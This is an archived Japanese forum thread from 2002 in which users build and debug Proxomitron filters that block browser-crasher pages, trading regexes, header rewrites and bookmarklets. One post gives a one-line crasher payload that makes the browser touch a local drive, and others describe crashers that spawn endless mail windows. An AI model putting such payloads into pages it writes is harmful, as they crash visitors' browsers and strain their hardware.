418 :02/11/02 15:55 ID:???
421 :
418 :02/11/02 17:00 ID:???
*( (src|href)=((^("|'|)(
http://|.+{0,2}/| )([^>"']++).(jp(e|)g|gif|png|bmp)[>"'])*))
[^>"'.]→[^>"']
<img src=images/hp0.gif width=158 height=78 alt="Google"> まだまだだね
423 :
:02/11/03 09:30 ID:bYzpExO7
>402のは Anti-Auto-Refresherが効かない、研究しよっと。
普通に効きますが、何か?
426 :
名無しさん@お腹いっぱい。 :02/11/03 20:08 ID:LfVJpwc8
>>374 これってなんのブラクラを防ぐフィルタですか?
>>374 これってなんのブラクラを防ぐフィルタですか?
>>374 これってなんのブラクラを防ぐフィルタですか?
427 :
424 :02/11/03 21:43 ID:???
チョットいじったらデケタ。
>>417 頑張っちゃダメですか(;´Д`)
>>422 クヲートで囲まれてなくて、URLの後ろに他のプロパテが付いてる場合って事ですか…?
ダメ出し/修正 おながいします
Name = "Bad Image Killer"
Match = "*(src|href)=(((^("|')(
http://|.+{0,2}/| )([^>"']++).(jp(e|)g|gif|png|bmp)[>"'])(^(
http://|.+{0,2}/| )([^> ]++).(jp(e|)g|gif|png|bmp)[> ]))(*)\3)"
追記 (*)\3はReplaceで使うかもしれないので一応入れてます でもReplace = "<a href=\3[bad-img]</a>"みたいにやると <a href=hoge><img src=ahyahya></a> の場合に不味いので結局\3は要らなかったりする罠…
>402のが防げない dbugで見る限りではちゃんとKUPきいてるのに
Name = "BadImageKiller"
Match = "*\s(src|href)="
"(^("|')(
http://|.+{0,2}/| )([^>"']++).(jp(e|)g|gif|png|bmp)[>"'])"
"(^(
http://|.+{0,2}/| )([^> ]++).(jp(e|)g|gif|png|bmp)[> ])"
"((("|')[^>"']++("|'))\3|([^> ]++)\3[> ])*"
Replace = "<a href=\3>[BadImg]</a>"
これでどうでしょうか。行は分かりやすいように分けました
Replaceしないなら、Matchの4行目は単に*だけにした方がイイかも
>>428 いや頑張っちゃダメってこたないけど。
そんなもんオレがどうこう言えるものでも、言ったからって従わなくちゃいけないものでもないし。
ただ、見ててどうも頑張る方向が間違ってるかなぁと思うだけ。
>406の「BadImageKillerは通してKUPなら防げるようなブラクラってある」という発言から
発展してる訳だけど、そもそもBad Image Killerってブラクラを防ぐのが目的なの?
元の作者が誰か知らんけど。
っていうか406がそうだと思ってて、途中の修正してる人も同一人物だと思い込んでたわけだけど。
imgのsrc属性で拡張子制限をやる意味はあると思う。
ただしブラクラ云々関係なくて、単純に画像以外の拡張子を読まない(cgi等を潰す)という目的で。
それだって完全ではないけど、実質問題無いだろうというだけのことで。
ブラクラと関連付けたいなら、拡張子制限で許可するファイルは$RESP()次第で MIMEを書き換えてそれに合わせたブラクラフィルタを実行、くらいやらんと。 でもIEの場合、それ以前にMIME関係ないからやっぱり意味ないし。 で、話は”拡張子を制限することで、どういうブラクラを防ぎたいの?”になるのだが。 Bad Image KillerがKUPの代わり足りえないっていうのは途中でいっぱい例示されてるわけだし。 KUPの誤爆が多くてKUPがいやっていうんでその代わりのフィルタを作るってのはイイと思うけど、 Bad Image Killerと一つにする意味はないと思う。 好みの問題かもしれんが、目的が違うんだからon/offの切り替えも別にしておきたいのですよ。
>>435 現象の説明をするなら、MIMEがtext/plainで来るから。
おそらくは広告よけの為にワザとやってるんだろうが、MIMEにきちんと従うブラウザで見ると
textとして表示されるんだよね。カンベンすれ。
というわけで、しかたないから175使いたいなら、併用で個別にMIMEを書き換えてやるよろし。
確かに拡張子規制は意味無いっぽいですね
(IEなら)HTMLでもIMGに指定したら壊れた画像として処理されるからブラクラじゃないですし
それでいくとProtocol部分を潰せば良いって事になってKUPに行き着く、と言う事ですか。
>>432 でIMGに指定されるHTTP以外は潰せるようになったんですが
KUPを改良したほうが良さそうですね…助言どうもでした。
説明さんくす。よくわかりました なんとかやってみます
In = TRUE Out = FALSE Key = "Content-Type: hoge4 (in)" URL = "*.shtm(l|)(^?)" Match = "text/(plain|x-server-parsed-html)(\0)" Replace = "text/html\0" たぶん他に影響ないと思うけど、URLマッチはサイト毎に変えたほうがいいかも。
>>439 LogWindowみて
あ、ほんとだ。plain/textになってる
HeaderFilterかあ。どうしようかなあ
とかおもってたところでした
ありがたく使わせていただきます
$IHDRでなく$TYPEを使う意味は何?速さ?
可読性かもよ
>>441 見た目さ
∧_∧
( ´_ゝ`)
/ \ TYPEは、タイプと読めるが、
/ / ̄ ̄ ̄ ̄/ IHDRは、読めないから
_(__ニつ/ FMV / ∧_∧ 誰かに、説明する時困る。
.|\ \/____/\ (´<_` ) だろ?兄者。
/\.\ \ ___ノ ⌒i
/ \| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| \ |. |
\ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\ \ と ̄ )
\ /. \ >  ̄ ̄
.ノ___________ノ
$IHDR(Content-Type:〜)だと Charsetも付いたりしてメンドクセーからじゃない? そういった意味では 442と443も同じ意味か…
>442-444 何となく理解した気分にはなったよ
447 :
名無しさん@お腹いっぱい。 :02/11/04 09:28 ID:owGnDN1U
>>374 これってなんのブラクラを防ぐフィルタですか?
>>374 これってなんのブラクラを防ぐフィルタですか?
>>374 これってなんのブラクラを防ぐフィルタですか?
450 :
名無しさん@お腹いっぱい。 :02/11/04 15:53 ID:ko16Jzsi
tocさん、久々の更新。 ありがとうございます。
451 :
ギコ :02/11/04 15:58 ID:???
スレスレスレスレスレ
キタ━━(゚∀゚)━━( ゚∀)━━━( ゚)━━( )━━(゚ )━━(∀゚ )━━━(゚∀゚)━━!!!!!
待っててよかったよ、ママン!
tocさんワッショイヽ(゚∀゚)メ(゚∀゚)メ(゚∀゚)ノワッショイ
457 :
455 :02/11/04 18:51 ID:???
>>456 ネタじゃないぞ。ちゃんと確認しないでネタって言うの(・A ・)イクナイ!
ネタUZeeeeeeeeeeeeeeeeeeeeee!!
俺みたいなオバカチャンにはtocさんみたいな賢い人に頼るしかないのよね。 ほんと有りがたい事です。 感謝感謝
460 :
:02/11/04 19:18 ID:???
久々の更新感謝!
4.4にようやく移行しました。
げ、マジだ。「どうせネタだろ」とか思ってたら・・・。
マジで強制IDじゃん
誰か強制ID記念ブラクラ持ってきてよ
about:<style>@import%20file:///a|/kinen.kakiko;</style>
自分の持ってるブラクラが防げるようになったか試したいんですがあげれるとこ ないですか?
tocさん、あんがと。 これで4.4にヴァUPできるヨ
強制ID記念sage
tocタンキタ━(゚∀゚)━!!!! うわーいL(´▽`L ) うわーいL(´▽`L ) ∩,,・Д・)∩ワチョーイ♪
473 :
455 :02/11/05 17:50 ID:4mC+96Dc
Googleのキャッシュのヤツは、やられたって感じだな。 思いっ切りBypassしてるよ。。
479 :
まとめ :02/11/05 22:40 ID:+bpWYnWL
すべてふせいだ。
なんと!
水鳥拳!!!
483 :
455 :02/11/05 23:30 ID:4mC+96Dc
オサーソ発見!!!
シャオ!!
本当に強いやつは負ける相手はとは戦わない。
大丈夫なの確認してから貼ってるチキソばっかりだ。 どうせなら自分が確実に死ぬやつもってこい。
Googleのキャッシュ以外をバイパスって、どうやるんだろう。 BypassListに、 [^/]++.google.*^(=cache:) じゃだめなの? だめだな。だれかお願い。
[^/]++.google.co(m|.[^./]++)/(^search\?q=cache:) これでどう?
それじゃクエリーの順番入れ換えたときにモロ食らうだろ。
まあもれはGoogleはSafeListとかBypassListには入れないからどうでもいいんだけどね。 Googleは検索後にURLのホスト名が名前じゃなくてIPアドレスのままで表示されることがあるし。
>490に何故か引っ掛かった
違う484だ。
と思ったらアドにBypass入れてあるのか (;´Д`)アフェ…
>>500 URLコマンドを有効にした場合は必ずプリフィクスを設定してください。
ずっと面倒で付けてなかったんだよね いまさらつけるのもなぁ…
>>502 bの一文字でもいいのに。
ヘルプを見ればわかるけど、プレフィクスの設定は強く勧告されてるよ。
利便さに駆逐されるとはよく言ったもんだ…
でも結局付ける事にしますた。
>>501 ,503,484 サンクス
やっぱ直打の時ダルイのでリンクコマンド改造してプレフィクス対応してみた
javascript:pf="prefix-dbug.."; pt="
http:// ";document.location.href=(document.location.href.substr(0,pt.length+pf.length)==pt+pf)?pt+document.location.href.substring(pt.length+pf.length):pt+pf+document.location.href.substring(pt.length);
javascript:pf="prefix-bypass.."; pt="
http:// ";document.location.href=(document.location.href.substr(0,pt.length+pf.length)==pt+pf)?pt+document.location.href.substring(pt.length+pf.length):pt+pf+document.location.href.substring(pt.length);
と思ったらprotocol部分がhttp固定 だめぽ
プレフィクスは\xにしておけばおみとろんが変換してくれるよ。
あ、フィルタ内での話だから
>>505 さんの要望とは違うのかな。
>>507 です。フィルタ内なら\xで無問題ですが
とっさにdbugしたい時にいちいちプレフィクスごとURL欄に打ち込むの面倒なので
以前張ってあったリンクコマソドをプレフィクス対応に改良してみました。
pf=の部分を替えるだけで、長いプレフィクスでもbypassもsrcもdbugも対応できます。
ただ、http以外考慮してないので、その辺が…
pt=document.location.href.match(new RegExp("^
http://|^ https:// ","i"));
だと一見正しそうな文字が帰ってくるのに lengthが1になって失敗…
思いっきりスレ違いっぽいので あとはJavaScript入門見ながら考えます
httpsなんて滅多にdbugしないから、505のままでも一応実用レベルではあるかと…
プリフィクスを設定って何ですか? 教えてください。やっぱ、俺って初心者だったんだなー
>>509 Config -> Access ->
Disable URL based Proxomitron commands にチェックを入れてる場合は必ず
Prefix All URL commands with: _____ <- ここに何かパスワードを入れること。
511 :
名無しさん@お腹いっぱい。 :02/11/06 07:44 ID:bkbi8tDq
>>496 防げたけど、痕跡がすごいなしかし。
ソース見る気も萎えた。
ウィルスとかないよな?
またオミトロンバイパスしたまま踏んでしまった・・
514 :
名無しさん@お腹いっぱい。 :02/11/06 16:20 ID:DuHX8hIH
>>512 私さ張り紙表示されないようにしてるんだけど、
会社とかで2ちゃん見たときレンガみたいな壁紙表示されると
逆に違和感覚えてしまう(w
∫ _____
∧,,∧ ∬ /
ミ´_ゝ`彡っc□ < みんな、
>>510 は、きっといい人だぞ。
_と~,, ~,,,ノ_. \ しかも、説明もわかりやすいと来たもんだ。
ミ,,,,/~), │ ━┳━  ̄ ̄ ̄ ̄ ̄
 ̄ ̄ ̄ .じ'J ̄ ̄| ┃
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ┻
>>515 Protect〜を新しいのに代えればOK。
4.4用のやつは4.3まででもたぶん使えると思うよ。
なんとなく
Name = "Bypass Button"
Active = TRUE
Limit = 8
Match = "<end>"
Replace = "<br><br><br><br><hr><br><br><br>"
"<form method="post" action="
http://\xbweb..\h\p ">"
"<input type="submit" value="Bypass"></form><end>"
Name = "dbug Button"
Active = TRUE
Limit = 8
Match = "<end>"
Replace = "<form method="post" action="
http://\xdbug..\h\p ">"
"<input type="submit" value="dbug"></form><end>"
>>516 いい人かもしれんが、間違ってることを教えてるのはなぁ・・・
disable vt. 体を不自由にする; 無能にする (from doing); 【法】 無資格にする; 【コンピユータ】 動作しないようにする.
523 :
515 :02/11/06 19:23 ID:/u8IgH6B
>>523 Protect Contents except HTMLよりも前に
何らかのフィルタがあるか
Protect Contents except Textを間違って入れてない?
_、_ ( ,_ノ` ) n 大丈夫、俺は信じてるぜ!  ̄ \ ( E) フ /ヽ ヽ_//
526 :
515 :02/11/06 20:06 ID:/u8IgH6B
過去ログ漁ってダメ元でいろいろやったら直ったよ。 オレみたいな厨のためにコピペしときます。 Protect Contents Except HTML を使っている場合は (Content-Type: (^text/html)*)の部分を (Content-Type: (^text/html|text/css)*)にした方がいいみたい。 Protect Contents except Text←つーかこれ何?
>>526 > Protect Contents Except HTML を使っている場合は
> (Content-Type: (^text/html)*)の部分を
> (Content-Type: (^text/html|text/css)*)にした方がいいみたい。
テストしてみたけどCSSはIEの場合、ダウンロードのダイアログが出るんだね。
ほかのブラウザだとどうなんだろ?MozillaとかOperaとか。
> Protect Contents except Text←つーかこれ何?
text/plainにタグが含まれたときにIEが反応するとは思わなかったときの名残では。
Operaは拡張子:.cssでMIME:text/cssなら設定に関らずテキストとして表示されるみたいでつ。 ブラクラになりません。
Operaはそういうふうに処理するのか。。 always filterとProtect〜を使わなくていいから ダウンロードが速くなっていいね。
531 :
515 :02/11/06 20:49 ID:/u8IgH6B
ゴメン、うそ言った。
>>526 は関係無いと思われ。
うまくいかなかったのは単にキャッシュを読んでたからみたい。
bgsoundとtext/cssなんて全然関係無いし(w
>>CSSをテキストで表示
mozillaもそうだよ。
>>533 ,534
修正。もしかしてフィルタに引っかからなくても平気とか?
toc氏のだけだと食らうと思ったんだけど。
Bypass Listを書きかえるブラクラ
>>528 IEでもOSのContent-Type設定によっては挙動が違うよ
デフォルトだとDLダイアログ出るけど、例えばVJ++インスコしたPCだとVJが立ち上がるし。
初歩的な質問なんだが、Bypass Listの登録って、
普通に
http:// から入れればいいの?
それとも、はじめに[^/]++っていれるの?
できれば、List系全部の登録の仕方おしえて。
∫ _____
∧,,∧ ∬ /
ミ´_ゝ`彡っc□ < みんな、
>>540 は無口だがいい人だぞ。
_と~,, ~,,,ノ_. \
ミ,,,,/~), │ ━┳━  ̄ ̄ ̄ ̄ ̄
 ̄ ̄ ̄ .じ'J ̄ ̄| ┃
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ┻
>>541 告知はこのスレだけでいいかと。
ブラクラフィルタを入れてる人は
こっちのスレもチェックしてるだろうし。
>>544 _, ._
( ´_ゝ`)・・・ だな。
547 :
名無しさん@お腹いっぱい。 :02/11/07 16:44 ID:g7pOqt7I
>>546 しねよ
ちゃんと内容説明してから貼り付けろ!!!!
548 :
455 :02/11/07 16:54 ID:YrvLT9vO
549 :
名無しさん@お腹いっぱい。 :02/11/07 17:08 ID:DyazcMLm
Local File Access Killerつけてもだめなのか?
俺の、FMVが悲鳴を上げたぞ!「ごごああぁぁっぁぁぁぁごぁあああああ!」ってな。
FMVショックのあまりに、心なしか画面が暗くなった。
慰謝料として、対策フィルタを公開しやがれ!
>>546 まったく、本当は金取るとこなのに対策フィルタを公開ですんで
良かったと思えまったく…。
>>552 「対象をファイルに保存」で、ローカルで見れば良かったのに。
ISO-2022-JP関連のやつがアプロダにあがってたが、あれいじってみればいいのかな。
うpろだどこー?
>>553 ブラクラ防ぐ自信があったんだよ。
トュックさんのフィルタも入れてたし、
結構自信あったんだけどなー
556 :
553 :02/11/07 18:19 ID:aTTRnLCr
swf内のスクリプトまで検出させるフィルタなんてあるのか? 今回みたいな単純なスクリプトなら引っ掛けるのは難しくないだろうが、 Matchし難いようにスクリプト書かれたら普通のswfと区別付かんと思うんだが…
ちなみに漏れは喰らいますた(・∀・) プラグインを実行しますか?で普通にイイエを押したら大丈夫だったが 興味本位でハイを押したらOpen実行されまくり。 ウインドウを再使用する設定だったから1個の窓が高速でリロードしていた 結局IEのプロセスを終了させて止めた
>>557 不完全ぽいが>165。
それとあわせて拡張子とOBJECTのclassidを比較して、.swf以外が記述されていたら殺す
くらいしか対応を思いつかんよ。
そもそも.swfで「Matchし難いようにスクリプト書かれ」るのかどうかも知らんし。
flashマスターな人が作ってみてくれネェかな。
560 :
名無しさん@お腹いっぱい。 :02/11/08 00:00 ID:E5c9k5Sc
皆さんどのくらいのCPUで使ってます? 自分1600+なんですけど、ブラクラ対策使うとやっぱ体感かなり遅いです。
cpuは300ですけど
>>560 フィルター整理したら?
軽さを求めるなら2ちゃん関係とTOCさんのブラクラ対策のみにして、
広告カットはフリーのFWに任せるとか
環境はCPU C3-833, Cable下り10Mbpsだけど、 Proxy使ってても速いものならばブラクラ対策フィルタを有効にしてても 画像もガンガン表示される。ぜんぜん不快じゃない。 匿名串みたいな遅いのを通すと画像が一個ずつしか表示されないし 画像をダウンロード中はHTMLすらダウンロードされない。かなり不快。
564 :
名無しさん@お腹いっぱい。 :02/11/08 00:12 ID:E5c9k5Sc
tocさんの入れれば Local File Access Killer Protocol src killer はいらないですかね?
566 :
名無しさん@お腹いっぱい。 :02/11/08 01:11 ID:xnPt9DA1
>>546 のやつみごとにHDDがギーギーなって寿命縮まった
わけですけど、対策方法きぼんた
文字コードうんぬんってのがいまひとつわからん
部落らで落ちるよりオミトロソで落ちる可能性のほうが大きいため部落らすべてはずした。 そしたらすぐ部落らにかかる俺は ウンコー(・∀・)
568 :
ほれ :02/11/08 09:09 ID:llMCB56Q
569 :
名無しさん@お腹いっぱい。 :02/11/08 09:10 ID:uFuzLj/l
>>567 オミトロンで落ちる?
はぁ?
またおまえみたいな下等で使えこなせない愚民は
使わないほうがいいだろうな
自分の不注意をソフトの欠陥と決め付け周囲に
間違った情報を伝達しかねないし
>>567 それはお前の環境そのものに問題がある(断言)
ME使ってます。 常駐はkerio、AVG。 バイパスすると落ちないので相性の問題かなとオモタ訳です。 部落らの外したら安定してきました。
>>571 Proxomitronのバージョンと
ブラクラフィルタの日付は?
573 :
:02/11/08 10:29 ID:nMh68qdr
設定めんどくさすぎ、スグ捨てた。
そうですか。はい次の厨どうぞ
どうも。
h1o2g3e4.tripod.co.jp/Browser-Crasher1.html h1o2g3e4.tripod.co.jp/Browser-Crasher2.html ↑のブラクラテストページ、デリられた?
577 :
名無しさん@お腹いっぱい。 :02/11/08 13:34 ID:yfQvy7W6
579 :
えぼし :02/11/08 14:09 ID:8XpG8rzV
「harmony.dllが見つかりません」て出てくることがあるのデスけど、 どうすればいいでしょう?誰か教えてください・・・。
581 :
576 :02/11/08 14:16 ID:ixo1q8vY
>>577 どもありがと。
でもそれではなくて、
ローカルファイルにアクセスする奴で、
fileってのが違う文字コードでもかかれてた物の方なんっす。
フロッピー「ガーガー」言う奴。
自分でフィルタ書く練習用に欲しいんだけど無いみたいすね。
>>582 いつまでも私たちの記憶と心の中に、、、
消されますた。 もともと一日くらいで消す予定だったけど、まさかその前にアカ削除食らうとは。 フィルタは他人をあてにせず各々でガンガレ。 誤爆覚悟で、タグの中身をmatchという前提を省けば文字コードなんざ気にならんし。 それがイヤな人は地道にISO-2022とつきあいましょう。 あとついでにあぷろだのアレは古いので消しますた。
RO厨はカエレ。
ブラチラにProxomitronで対抗するスレ パンチラにProxomitronで対抗するスレ マンチラにProxomitronで対抗するスレ スレを乗っ取られるならどれがいい?俺はブラチラかな…
588 :
名無しさん@お腹いっぱい。 :02/11/09 11:31 ID:lOCjBFaY
あちらにProxomitronで対抗するスレ どちら?(^_^;
589 :
名無しさん@お腹いっぱい。 :02/11/09 15:31 ID:HIEWq0Kb
ゴジラにProxomitronで対抗するスレ 対ゴジラフィルターきぼんた ( ̄▽ ̄) ニヤ
_____________________________ | |★★荒らしは放置が一番キライ!★★ | |●重複スレ、板違いスレには誘導リンクを貼って放置! | ウザイと思ったらそのまま放置! | |▲放置された荒らしは煽りや自作自演であなたのレスを誘います! | ノセられてレスしたらその時点であなたの負け! | |■反撃は荒らしの滋養にして栄養であり最も喜ぶことです | アラシにエサを与えないで下さい | |☆枯死するまで孤独に暴れさせておいて | ゴミが溜まったら削除が一番です | | 。 Λ Λ / (,,゜Д゜)⊃ 基本はコレデスナ! 〜/U / U U  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
591 :
名無しさん@お腹いっぱい。 :02/11/09 18:05 ID:EU94dLLs
590は各地で釣り荒らししてるヴァカだからほっとけ
593 :
aa :02/11/09 21:35 ID:uHNWEeVY
>>593 ソ板のウィルスバスタースレにもメアド貼ってたね…何したいんだ?
598 :
名無しさん@お腹いっぱい。 :02/11/10 12:33 ID:0RPOgw+A
こらおまえら新しいフィルター発表しろよ!!!!!
目的も無くフィルタを欲しがる これ、悪い見本。
>>598 こらおまえ新しいブラクラ持って来いよ!!!!!!
601 :
名無しさん@お腹いっぱい。 :02/11/10 15:49 ID:/HrUGxyl
>>599 おまえみたいに能なしで人煽るだけしか
楽しみがない奴に言われたくないよ!!!
おまえと私はいわば同類だ
なぁ
>>600 よ
ひっかかるのはIEユーザだけか( ´,_ゝ`)
ImageCheckerで防いだ
Name = "Image Checker" Active = TRUE Limit = 256 Match = "$IHDR(Content-Type: image/(jpeg|gif|png|bmp))&(<*(!DOCTYPE|html|head|title|body|script|img|src|href|file|style|link))" Replace = "html content found! \k" これ? 入れてるけど、だめだった。
Protect Contents except HTML (2002/11/04) 4.4用できちんと引っ掛かかってるみたいだ。toc氏GJ(´∀`)
Protect Contents except HTML (2002/11/04)入れてるのに
>>602 だめだ・・・(´・ω・`)
609 :
608 :02/11/10 22:59 ID:vmoj73IB
SleipnirだけどEdmaxが無限起動する。どうすりゃいいの?
>>606 残っているキャッシュが原因だと思う。
IEのキャッシュを消したらちゃんと効くよ。
やってみて。
おお〜、Image Checker マンセー。あげ というか、Protect Contents except HTML と Image Checker を同居させてるんだけど、 Protect Contents except HTML を FALSE にしたら、 Image Checker が防いでくれた。 これって、Image Checker を先頭に持っていくのが正解? (同居がまずいのかな?)
>>26 はげしく遅レスで申し訳ないんだけど、
>ネトランの付属CDに入ってるフィルター
これって何?Webでも配布されてるやつ?
知ってる人いたら詳細キボンヌ
ブラクラフィルターを2ch見る時だけアクティブにしたいのですか どうすればいいのですか?
特製ブロックリストも入ってたな
619 :
名無しさん@お腹いっぱい。 :02/11/11 20:16 ID:n/0dQKF7
620 :
名無しさん@お腹いっぱい。 :02/11/11 20:18 ID:n/0dQKF7
>>615 >>618 特製ブロックリストもついてくるやつも全部オミトロンスレで
手に入るし気にしないでくれ。
621 :
608 :02/11/11 21:43 ID:CV3D7Ehu
>>610 ヘッダフィルタってどれをいじればいいんですか?
>>621 always filterのContent-lengthを書き換えるだけなんだが。。
わからなければ、それを消してマージしなおせば?
クレクレ君でスマソ AdList用の広告サイトリストください
今回のProtect〜の更新って見た目だけ?
見た目だけなら俺こんなのにしてんだけど。割と使い易いと思う
$IHDR(Content-Type: (^text/html)*)
(*(< (!DOCTYPE|html|head|body|img|table|frameset|(i|)frame|ilayer|script) [^>]+>|javascript:)
$SET(#=<html>\n
<head>\n<title>\nHTML Contents Found\n</title>\n</head>\n
<body bgcolor="300000" text="FF8000" style="margin:0" scroll="no">\n
<table width=100% height=100%>\n
<tr height=10><td>
HTML Contents Found.\n
URL: <a href="
http://\xbweb..src..\h\p " target="viewsrc">\u</a>\n
</td></tr><tr><td>
<iframe name="viewsrc" src="" width="100%" height="100%" frameborder="0"></iframe>\n
</td height=*></tr>
</table>\n
</body>\n
</html>\k)$STOP()|(?*)\#)
625 :
名無しさん@お腹いっぱい。 :02/11/12 03:57 ID:/pmkJ4D/
色はimageCheckerの色が好きだったので趣味ワリーとか却下 このスレJaneで見ると ここ壊れてます になる…俺の所為か?
>>624 自分で使う分だし自由にやればいいのでわ
あんがと。
壊れる原因は
>>624 のフィルタのjavascript部分がMatchしてた所為だった。スマソ
FLASH対策まで取り込もうとして 安易に文字を追加して失敗したと言う悪い見本…
ん? Janeで2ちゃんのDATを読み込むのにProxomitronを通してるの? 激しく無駄なことしてるような。 それとも画像が壊れるというちょいむかしの話?
629 :
名無しさん@お腹いっぱい。 :02/11/12 11:53 ID:iO8x3WAF
>>625 Janeでオミトロン通してみてるわけ?
631 :
名無しさん@お腹いっぱい。 :02/11/12 15:32 ID:iO8x3WAF
tocさん作のブラクラ対策フィルタは、皆さんどこら辺の位置に置いていますか? このフィルタよりは上に置けとかそういうのはありますか?
Protect Contents except HTML hoge2 KUP hoge3 imagecheck[p] imagecheck tocさんの mailkiller[自作] addlink Adkiller Banner Blaster Ver.Prox - J 3 (2001/07/22) はじめからある奴 free webspace adkiller Bypass & dbug Button Excite Translation Link Button
634 :
名無しさん@お腹いっぱい。 :02/11/12 19:31 ID:kNPI3WZf
>>623 自分で実際にサイト回ってリスト化しろ。糞野郎は死ね
いろいろ無駄が多いような・・・まぁいいけど。 Protect Contents except HTMLとhogeとimagecheckは、マッチする内容に差があるけど 目的は一緒だからどれか一つに絞る or まとめたほうがいくない?
>>635 漏れもそう思った。が、現実として、Protect Contents except HTMLで
>>602 は防げる?
(最初に食らってるから、ちと不安・・・。)
asdf
>>636 俺はProtect Contents except HTML (2002/11/06) で防げてるよ。
639 :
名無しさん@お腹いっぱい。 :02/11/12 22:08 ID:0cRhYunT
>>638 Protect Contents except HTML (2002/11/10) が出てますよ。
640 :
名無しさん@お腹いっぱい。 :02/11/12 22:23 ID:vyc+/RWw
641 :
名無しさん@お腹いっぱい。 :02/11/13 13:44 ID:S9xvxEZX
「Protect Contents except HTML」ってどこにあるんですか?
643 :
名無しさん@お腹いっぱい。 :02/11/13 14:58 ID:BArNgr/f
そういえば最初からある Webpage Background Killer に慣れすぎて 自分のPCじゃない環境でネットして2ch見ると 煉瓦模様なので逆に違和感感じてしまうようになった(^_^;
>>643 でも、そのほうが間違ってブラクラ踏まなくていいんでない?
645 :
名無しさん@お腹いっぱい。 :02/11/13 19:42 ID:pkW0NQJ0
test
XP,Slepnir,EdmaxでProtect Contents except HTML (2002/11/10)を先頭においてあるにもかかわらず
>>602 でSleipnirが固まる。タスクマネージャを見るとEdmaxが大量起動している。
Sleipnirで「mailto:でメールソフトを起動しない」にしているのにだめです。
この状態は回避不可ですか?
>>647 Content-Length: always filter (In) も入れてるよね、もちろん。
>>645 ぃゃぃゃ、漏れってついついクセで「ブラクラ」って文字見ると、進んでクリックしちゃうから。
視覚的に「オミトロンがない」ってことがわかれば間違い起きないでしょ?
よく分からんが まだ踏んでないブラクラ見たら脊髄反射で踏んでしまう心境には激しく同意する
651 :
647 :02/11/14 00:48 ID:O8ZRsnoN
>>651 最新のもの?ちゃんとサイズを大きくしてるよね?
>>652 横レスなんだけどさ、最新のやつ一桁増えてない?
前は51200だったと思うんだが・・今は512000になってる
>>653 サイズの大きいブラクラが増えたからだよ
何故サイズでリミットかけてあるのかワケ和姦ね
656 :
647 :02/11/14 02:02 ID:O8ZRsnoN
>>652 こんな感じです
In = TRUE
Out = FALSE
Key = "Content-Length: always filter (In)"
URL = "^$LST(SafeList)"
Match = "([#0:512000])\0"
Replace = "\0$FILTER(true)"
漏れも思う。 ブラクラの大きさがxx以下であるなんてのを期待するのは馬鹿げてる。
>>656 とりあえずキャッシュ消せ。それでもダメならdbugだ。
>>656 ぅぁ。やってもた。
いいかげんな予想だと、他のヘッダフィルタで$FILTER(false)してるか、
Content-Length:を消してると思われ。
>>657 まあたしかにそうなんだけど、4MBytesの動画みたいな
データにProtectがマッチすると、かなり処理が遅くなって
実用的じゃなくなるからね。
ブラクラはたいていフリーなウェブホスティングサイトに
置かれると思うけど、そういうところは転送量の制限を
していることが多いから、あんまり大きなブラクラを
置いて、しかも2chなんかにそのURLを晒すと
あっというまに503とか404になっちゃう。
有料の転送量無制限なサーバにでかいブラクラを
置く人ってまぁいないよね。
たしかContent-Length:で線引きするようになったのは
image checkerで2種類のバージョンがあって、
サイズの指定は自分で勝手にやれってことだったと思うよ。
だから
>>655 さんとか
>>657 さんみたいに思うんだったら
自分で
In = TRUE
Out = FALSE
Key = "URL: always filter (In)"
Match = "^$LST(SafeList)"
Replace = "$FILTER(true)"
みたいにやればいいんじゃない?
661 :
647 :02/11/14 02:58 ID:cn7tpSN0
>>661 プレフィクスの設定をしてないのでは?
Config -> Access ->
Disable URL based Proxomitron commands のチェックをはずし、必ず
Prefix All URL commands with: _____ <- ここに何かパスワードを入れること。
665 :
647 :02/11/14 03:20 ID:cn7tpSN0
>>662 すいません それやってませんでした
デバッグコマンドはできましたが何がおかしいのか見方がわかりません。
どこを検証すればよいのでしょう?
>>664 HTML Debug Info...初めて知った。。
これにチェック入れると強制的にデバッグモードになるのかー
使ってみると便利かも。サンクス。
けっこう保守的な性格だから
使わない機能はとことん使わないんだよね。
>>665 ところでヘルプは読んだ?
読んでないのにヘルプの内容までいちいち説明させる気じゃないよね?
>>664 の最後の一行が当たってたりしない?
668 :
647 :02/11/14 03:26 ID:cn7tpSN0
>>669 それだけを使うと画像が壊れるよ。
というかそれは間違ってるから使わないほうがいい。
dbugしたときに <Match: hogehgoe > 〜〜〜〜〜〜 </Match> みたいなのなやつがない?スタイルシートが有効なら赤色で。 もし一個もなければ、おそらくはフィルタ有効になってないと思われ。 Content-Length: always filter (In)を書く場所間違えてないか? [HTTP headers] から [Patterns] の間に書くんだぞ?
672 :
647 :02/11/14 03:51 ID:cn7tpSN0
>>671 image checkerでデバッグしたところ
貴方のパソコンに、ウイルスを感染させました。
すぐに、全データを削除しないと、個人情報を流し続けます。なお、このウイルスは駆除不能です。あしからず。
<Match: Image Checker >
<html
</Match>
html content found!
とだけ表示されました。
実際に踏んでみるとやはりフリーズします。で、sleipnirの設定で画像を読みこまない設定に
するととりあえずフリーズは免れました。困ったなあ・・・
image checkerってどんなフィルタだったっけ。
>>670 マジで?
>>672 Protect Contents except HTML (2002/11/06)が効いてないとそうなるみたい。
(実験した。)
で、tocさんのフィルタは最初の部分に入ってるの?
675 :
673 :02/11/14 04:05 ID:UCAOX4rG
あれ・・・俺の最新じゃない・・・・? 入れたはずなのに。
<Match: Protect Contents except HTML (2002/11/10) > 貴方のパソコンに、ウイルスを感染させました。 すぐに、全データを削除しないと、個人情報を流し続けます。なお、このウイルスは駆除不能です。あしからず。 <html> </Match> キチンと動いてればこうなるみたい。 とりあえず、Protect Contents except HTML (2002/11/10) 一旦消してマージし直してみたら?
>>676 マージしなおしたんですが、その前に問題発生。
いろいろフィルタいじって何回も
>>602 踏んで試してたんですが、突然「ページを
表示できません」がでるようになりました。他のサイトでも同じです。
オミトロンを切れば大丈夫なんですがこれはなんでしょう?
オミトロン壊れた?
